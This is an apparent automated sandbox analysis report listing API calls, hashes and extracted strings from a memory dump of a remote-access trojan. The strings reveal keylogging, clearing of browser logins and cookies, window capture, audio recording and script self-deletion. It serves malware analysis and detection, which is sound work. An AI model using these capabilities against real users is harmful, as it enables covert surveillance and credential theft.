                                                                                                            • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                            • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                            • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                            • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1036877536-0
                                                                                                            • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                                            • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                            • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                                            • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                            • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                            • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                            • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3360349984-0
                                                                                                            • Opcode ID: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                                                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                            • Opcode Fuzzy Hash: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                                                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                            • API String ID: 3472027048-1236744412
                                                                                                            • Opcode ID: f67da73cb2a02539f4d7dbc2d65eb95b4f98d554b542dc907f6a3b7988cd3d28
                                                                                                            • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                            • Opcode Fuzzy Hash: f67da73cb2a02539f4d7dbc2d65eb95b4f98d554b542dc907f6a3b7988cd3d28
                                                                                                            • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                                            • String ID: @CG$exepath$BG
                                                                                                            • API String ID: 4119054056-3221201242
                                                                                                            • Opcode ID: 4b5d4860d097bb15903a365519ba02cddbdb2c7d02e23e68ccb2f20ada22baa5
                                                                                                            • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                            • Opcode Fuzzy Hash: 4b5d4860d097bb15903a365519ba02cddbdb2c7d02e23e68ccb2f20ada22baa5
                                                                                                            • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                              • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                              • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                                            • String ID: [ $ ]
                                                                                                            • API String ID: 3309952895-93608704
                                                                                                            • Opcode ID: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
                                                                                                            • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                            • Opcode Fuzzy Hash: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
                                                                                                            • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3604237281-0
                                                                                                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                            • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                            • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                            • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                            • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                            • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                            • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                            • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                            • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                              • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                              • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                            • String ID:
                                                                                                            • API String ID: 737400349-0
                                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                            • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                            • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                            • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                            • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                            • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 3919263394-0
                                                                                                            • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                            • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                            • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                            • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4116985748-0
                                                                                                            • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                            • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                            • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                            • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                            APIs
                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleOpenProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 39102293-0
                                                                                                            • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                                                            • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                            • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                                                            • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountEventTick
                                                                                                            • String ID: >G
                                                                                                            • API String ID: 180926312-1296849874
                                                                                                            • Opcode ID: 8681510b208d111c2b0c46276fb7d1def0d581fb781ad4e2081365c838aeaf8b
                                                                                                            • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                            • Opcode Fuzzy Hash: 8681510b208d111c2b0c46276fb7d1def0d581fb781ad4e2081365c838aeaf8b
                                                                                                            • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $fD
                                                                                                            • API String ID: 1807457897-3092946448
                                                                                                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                            • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                            • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                            APIs
                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 0-711371036
                                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                            • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                            • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                            Strings
                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                            • API String ID: 481472006-1507639952
                                                                                                            • Opcode ID: 56914ec683c0f854cfe337d66ad939822683803ad371fa52872332a087436636
                                                                                                            • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                            • Opcode Fuzzy Hash: 56914ec683c0f854cfe337d66ad939822683803ad371fa52872332a087436636
                                                                                                            • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                            • API String ID: 481472006-2430845779
                                                                                                            • Opcode ID: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                                            • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                            • Opcode Fuzzy Hash: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                                            • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                            APIs
                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExistsFilePath
                                                                                                            • String ID: alarm.wav$xIG
                                                                                                            • API String ID: 1174141254-4080756945
                                                                                                            • Opcode ID: 5e2cc61e5469dce6cd81fe38bc9b3898a15368567c28f87c540c39d025e7a3e9
                                                                                                            • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                            • Opcode Fuzzy Hash: 5e2cc61e5469dce6cd81fe38bc9b3898a15368567c28f87c540c39d025e7a3e9
                                                                                                            • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                            • String ID: Online Keylogger Stopped
                                                                                                            • API String ID: 1623830855-1496645233
                                                                                                            • Opcode ID: 319d7400761289b2542cd9082559967ddf1120e6fa0471cb6b6b4a5462119b43
                                                                                                            • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                            • Opcode Fuzzy Hash: 319d7400761289b2542cd9082559967ddf1120e6fa0471cb6b6b4a5462119b43
                                                                                                            • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                            APIs
                                                                                                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                                            • String ID: T=G
                                                                                                            • API String ID: 2315374483-379896819
                                                                                                            • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                            • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                            APIs
                                                                                                            • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocaleValid
                                                                                                            • String ID: IsValidLocaleName$j=D
                                                                                                            • API String ID: 1901932003-3128777819
                                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                            • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                            • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
